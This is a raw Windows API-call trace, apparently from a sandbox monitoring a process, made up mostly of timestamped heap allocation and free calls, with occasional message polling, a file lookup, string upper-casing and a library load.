RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0205.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0205.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0205.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0205.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0205.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0205.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0205.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0205.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0205.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0205.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0205.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0205.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0205.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.926] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0205.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0205.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0205.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0205.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0205.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0205.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0205.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0205.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0205.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0205.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0205.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0205.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0205.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0205.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0205.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0205.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0205.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0205.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0205.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0205.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0205.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0205.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0205.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0205.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0205.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0205.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0205.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0205.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0205.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0205.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0205.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0205.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0205.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0205.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0205.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0205.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0205.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0205.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0205.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0205.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0205.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0205.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0205.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0205.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0205.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0205.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0205.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0205.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0205.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0205.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0205.929] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\erIdlI.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefc63ec0, ftCreationTime.dwHighDateTime=0x1d5d4df, ftLastAccessTime.dwLowDateTime=0x3e509020, ftLastAccessTime.dwHighDateTime=0x1d5cb5a, ftLastWriteTime.dwLowDateTime=0x3e509020, ftLastWriteTime.dwHighDateTime=0x1d5cb5a, nFileSizeHigh=0x0, nFileSizeLow=0xe7e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="erIdlI.wav", cAlternateFileName="")) returned 0x9e21f8 [0205.929] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0205.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0205.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0205.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0205.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0205.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0205.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0205.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.930] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0205.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0205.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0205.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0205.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0205.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0205.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0205.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0205.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0205.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0205.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0205.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0205.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0205.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0205.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.931] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.932] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0205.932] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.932] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0205.932] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0205.932] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.932] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.932] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.932] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.933] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0205.933] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0205.933] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.933] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.934] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 